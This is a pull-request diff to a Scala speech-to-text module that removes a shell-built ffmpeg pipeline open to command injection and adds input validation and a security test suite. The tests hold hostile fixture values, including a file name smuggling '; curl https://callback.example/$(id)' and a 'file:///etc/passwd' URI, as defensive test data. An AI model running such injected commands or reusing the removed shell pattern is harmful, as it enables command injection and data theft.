Skip to content
Merged
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
Original file line number Diff line number Diff line change
Expand Up @@ -18,6 +18,7 @@ import com.microsoft.cognitiveservices.speech.transcription.{Conversation, Conve
ConversationTranscriptionEventArgs, Participant}
import com.microsoft.cognitiveservices.speech.util.EventHandler
import org.apache.commons.io.FilenameUtils
import org.apache.commons.io.input.TeeInputStream
import org.apache.hadoop.fs.Path
import org.apache.spark.broadcast.Broadcast
import org.apache.spark.injections.SConf
Expand All @@ -30,19 +31,64 @@ import org.apache.spark.sql.types._
import org.apache.spark.sql.{DataFrame, Dataset, Row}
import spray.json._

import java.io.{BufferedInputStream, ByteArrayInputStream, Closeable, InputStream}
import java.io.{BufferedInputStream, ByteArrayInputStream, Closeable, FileOutputStream, IOException, InputStream}
import java.lang.ProcessBuilder.Redirect
import java.net.{URI, URL}
import java.util.UUID
import java.util.{Locale, UUID}
import java.util.concurrent.{LinkedBlockingQueue, TimeUnit}
import scala.concurrent.{ExecutionContext, Future, blocking}
import scala.language.existentials
import scala.util.Try

object SpeechToTextSDK extends ComplexParamsReadable[SpeechToTextSDK]

/** Helpers for validating ffmpeg inputs and building the ffmpeg command line without a shell. */
private[speech] object SpeechSDKBase {
  // Fixed output-encoding flags; appended after any caller-supplied ffmpeg arguments.
  private val FfmpegOutputArgs = Seq("-acodec", "mp3", "-ab", "257k", "-f", "mp3")
  // Value handed to ffmpeg's -protocol_whitelist option.
  private val FfmpegProtocolWhitelist = "http,https,tcp,tls,crypto"
  private val HttpSchemes = Set("http", "https")
  // Both patterns describe a PREFIX and are applied with findPrefixOf. A whole-string match ending
  // in ".*" silently fails on names containing a line terminator (regex '.' does not match them),
  // which would let a value such as "http://host/a\nb" pass as a scheme-less local path.
  private val UriSchemePattern = "^[A-Za-z][A-Za-z0-9+.-]*:".r
  private val WindowsDrivePathPattern = "^[A-Za-z]:[\\\\/]".r

  /** Parses `uri` with [[java.net.URI]].
    *
    * @param uri candidate URI text
    * @return the parsed URI, or `None` when construction throws (e.g. syntax error or null input)
    */
  def parseUri(uri: String): Option[URI] = Try(new URI(uri)).toOption

  /** Reports whether the URI's scheme is `http` or `https`, compared case-insensitively.
    *
    * @param uri an already parsed URI; a missing scheme yields `false`
    */
  def isHttpUri(uri: URI): Boolean =
    Option(uri.getScheme).map(_.toLowerCase(Locale.ROOT)).exists(HttpSchemes)

  /** Ensures `uri` parses and uses the http or https scheme.
    *
    * @param uri the ffmpeg input URI
    * @return the parsed URI
    * @throws IllegalArgumentException when the text does not parse or uses another scheme
    */
  def validateFfmpegUri(uri: String): URI = {
    val parsedUri = parseUri(uri).getOrElse {
      throw new IllegalArgumentException("ffmpeg input URI must be a valid http(s) URI")
    }
    require(isHttpUri(parsedUri), "ffmpeg input URI must use the http or https scheme")
    parsedUri
  }

  /** Checks that a recorded-audio file name looks like a plain local path.
    *
    * Rejected: null or blank names, names starting with '-', names containing NUL, and names that
    * begin with a URI scheme. A drive-letter path (`C:\...` or `C:/...`) also begins with a
    * scheme-like prefix and is accepted only when `OsUtils.IsWindows` is true.
    *
    * @param fileName the candidate file name
    * @return the file name, unchanged
    * @throws IllegalArgumentException when any of the checks above fails
    */
  def validateRecordedFileName(fileName: String): String = {
    val fn = Option(fileName).filter(_.trim.nonEmpty).getOrElse {
      throw new IllegalArgumentException("Recorded file name must be non-empty when recordAudioData is true")
    }
    // Prefix checks only: the remainder of the name (including any line terminators) is irrelevant.
    val hasUriScheme = UriSchemePattern.findPrefixOf(fn).isDefined
    val isWindowsDrivePath = WindowsDrivePathPattern.findPrefixOf(fn).isDefined

    require(!fn.startsWith("-"), "Recorded file name must not start with '-'")
    require(!fn.contains('\u0000'), "Recorded file name must not contain NUL characters")
    require(!hasUriScheme || (OsUtils.IsWindows && isWindowsDrivePath),
      "Recorded file name must be a local file path without a URI scheme")
    fn
  }

  /** Builds the ffmpeg argument vector that transcodes `uri` to mp3 on stdout (`pipe:1`).
    *
    * The result is a plain argument list with `ffmpeg` as its first element; no shell is involved.
    *
    * @param uri       input URI; must pass [[validateFfmpegUri]]
    * @param extraArgs caller-supplied ffmpeg arguments, placed after the input and before the fixed
    *                  output flags; they are not validated here
    * @return the full command, ending in `pipe:1`
    * @throws IllegalArgumentException when `uri` is not a valid http(s) URI
    */
  def makeFfmpegCommand(uri: String,
                        extraArgs: Seq[String]): Seq[String] = {
    validateFfmpegUri(uri)
    val outputArgs = extraArgs ++ FfmpegOutputArgs
    Seq("ffmpeg", "-y",
      "-reconnect", "1", "-reconnect_streamed", "1", "-reconnect_delay_max", "2000",
      "-protocol_whitelist", FfmpegProtocolWhitelist, "-i", uri) ++ outputArgs ++ Seq("pipe:1")
  }
}

//scalastyle:off no.finalize
private[ml] class BlockingQueueIterator[T](lbq: LinkedBlockingQueue[Option[T]],
onClose: => Unit) extends Iterator[T] with Closeable {
onClose: => Unit) extends Iterator[T] with Closeable {
var nextVar: Option[T] = None
var isDone = false
var takeAnother = true
Expand Down Expand Up @@ -242,31 +288,38 @@ abstract class SpeechSDKBase extends Transformer
dynamicParamRow: Row): (InputStream, String) = {
if (isUriAudio) { //scalastyle:ignore cyclomatic.complexity
val uri = row.getAs[String](getAudioDataCol)
val ffmpegCommand: Seq[String] = {
val body = Seq("ffmpeg", "-y",
"-reconnect", "1", "-reconnect_streamed", "1", "-reconnect_delay_max", "2000",
"-i", uri) ++ getExtraFfmpegArgs ++ Seq("-acodec", "mp3", "-ab", "257k", "-f", "mp3", "pipe:1")

if (getRecordAudioData && OsUtils.IsWindows) {
val fn = row.getAs[String](getRecordedFileNameCol)
body ++ Seq("-acodec", "mp3", "-ab", "257k", "-f", "mp3", fn)
} else if (getRecordAudioData && !OsUtils.IsWindows) {
val fn = row.getAs[String](getRecordedFileNameCol)
Seq("/bin/sh", "-c", (body ++ Seq("|", "tee", fn)).mkString(" "))
val parsedUriOpt = SpeechSDKBase.parseUri(uri)
val extension = parsedUriOpt
.flatMap(parsedUri => Option(parsedUri.getPath))
.map(FilenameUtils.getExtension)
.getOrElse(FilenameUtils.getExtension(uri))
.toLowerCase(Locale.ROOT)
val isHttpUri = parsedUriOpt.exists(SpeechSDKBase.isHttpUri)

if (Set("m3u8", "m4a")(extension) && isHttpUri) {
val recordedFileName = if (getRecordAudioData) {
Some(SpeechSDKBase.validateRecordedFileName(row.getAs[String](getRecordedFileNameCol)))
} else {
body
None
}
}

val extension = FilenameUtils.getExtension(new URI(uri).getPath).toLowerCase()

if (Set("m3u8", "m4a")(extension) && uri.startsWith("http")) {
val ffmpegCommand = SpeechSDKBase.makeFfmpegCommand(uri, getExtraFfmpegArgs.toSeq)
val proc = new ProcessBuilder()
.redirectError(Redirect.INHERIT)
.redirectInput(Redirect.INHERIT)
.command(ffmpegCommand: _*)
.start()
val stream = proc.getInputStream
val stream = recordedFileName match {
case Some(fn) =>
try {
new TeeInputStream(proc.getInputStream, new FileOutputStream(fn), true)
} catch {
case e: IOException =>
proc.destroy()
throw e
}
case None =>
proc.getInputStream
}

if (getExtraFfmpegArgs.contains("-t")) {
val timeLimit = getExtraFfmpegArgs(getExtraFfmpegArgs.indexOf("-t") + 1).toInt
Expand All @@ -285,7 +338,7 @@ abstract class SpeechSDKBase extends Transformer
}

(stream, "mp3")
} else if (uri.startsWith("http")) {
} else if (isHttpUri) {
val conn = new URL(uri).openConnection
conn.setConnectTimeout(5000) //scalastyle:ignore magic.number
conn.setReadTimeout(5000) //scalastyle:ignore magic.number
Expand Down
Original file line number Diff line number Diff line change
@@ -0,0 +1,101 @@
// Copyright (C) Microsoft Corporation. All rights reserved.
// Licensed under the MIT License. See LICENSE in project root for information.

package com.microsoft.azure.synapse.ml.services.speech

import com.microsoft.azure.synapse.ml.core.test.base.TestBase

/** Checks that ffmpeg commands are built as plain argument vectors and that the
  * URI / recorded-file-name validators in SpeechSDKBase reject unexpected input.
  */
class SpeechToTextSDKSecuritySuite extends TestBase {

  // Inputs containing characters a shell would interpret if the command were ever shell-built.
  private val hostileUri =
    "https://example.com/audio.m3u8;$(id)?token=$HOME"
  private val hostileRecordedFileName =
    "/tmp/out.mp3; curl https://callback.example/$(id) #"
  private val durationArgs = Seq("-t", "2.5")
  private val expectedWhitelist = "http,https,tcp,tls,crypto"

  /** Command for the hostile URI with the sample extra arguments. */
  private def hostileCommand(): Seq[String] =
    SpeechSDKBase.makeFfmpegCommand(hostileUri, durationArgs)

  /** Number of positions at which the extra arguments appear as a contiguous run. */
  private def extraArgRuns(command: Seq[String]): Int =
    command.sliding(durationArgs.length).count(_ == durationArgs)

  /** Asserts that none of the given tokens is an element of the command. */
  private def assertAbsent(command: Seq[String], tokens: String*): Unit =
    tokens.foreach(token => assert(!command.contains(token)))

  test("audio streams are passed to ffmpeg without a shell") {
    val cmd = hostileCommand()

    assert(cmd.head == "ffmpeg")
    val flagAt = cmd.indexOf("-protocol_whitelist")
    assert(flagAt > 0)
    // The whitelist value, the input flag and the URI must directly follow the whitelist flag.
    Seq(expectedWhitelist, "-i", hostileUri).zipWithIndex.foreach { case (expected, offset) =>
      assert(cmd(flagAt + 1 + offset) == expected)
    }
    assertAbsent(cmd, "/bin/sh", "-c", "|", "tee", hostileRecordedFileName)
    assert(cmd.contains(hostileUri))
    assert(cmd.count(_ == hostileUri) == 1)
    assert(extraArgRuns(cmd) == 1)
  }

  test("ffmpeg command writes only to stdout") {
    val cmd = hostileCommand()

    assert(cmd.head == "ffmpeg")
    assert(cmd.last == "pipe:1")
    assertAbsent(cmd, "/bin/sh", "|", "tee", hostileRecordedFileName)
    assert(extraArgRuns(cmd) == 1)
  }

  test("ffmpeg command rejects unsupported input protocols") {
    val rejectedUris = Seq(
      "file:///etc/passwd",
      "concat:https://example.com/a|https://example.com/b",
      "data:text/plain,hello",
      "httpx://example.com/audio.m3u8",
      " http://example.com/audio.m3u8"
    )
    for (candidate <- rejectedUris) {
      intercept[IllegalArgumentException] {
        SpeechSDKBase.makeFfmpegCommand(candidate, Seq.empty)
      }
    }
  }

  test("ffmpeg command accepts uppercase http schemes") {
    val upperCaseUri = "HTTPS://example.com/audio.m3u8"
    val cmd = SpeechSDKBase.makeFfmpegCommand(upperCaseUri, Seq.empty)

    assert(cmd.contains(upperCaseUri))
  }

  test("recorded file names are validated as local paths") {
    // Shell metacharacters are acceptable in a local path because no shell ever sees it.
    val accepted = SpeechSDKBase.validateRecordedFileName(hostileRecordedFileName)
    assert(accepted == hostileRecordedFileName)

    val rejectedNames = Seq(
      "-out.mp3",
      "http://example.com/out.mp3",
      "https://example.com/out.mp3",
      "file:///tmp/out.mp3",
      "pipe:1",
      "data:text/plain,hello",
      "concat:/tmp/a|/tmp/b"
    )
    for (candidate <- rejectedNames) {
      intercept[IllegalArgumentException] {
        SpeechSDKBase.validateRecordedFileName(candidate)
      }
    }
  }

  test("recorded file names must be non-empty") {
    intercept[IllegalArgumentException] {
      SpeechSDKBase.validateRecordedFileName("")
    }
    intercept[IllegalArgumentException] {
      // An unset system property is read to obtain a missing (null) file name.
      val absentName = System.getProperty("synapseml.speech.recordedFileName.missing")
      SpeechSDKBase.validateRecordedFileName(absentName)
    }
  }
}
Loading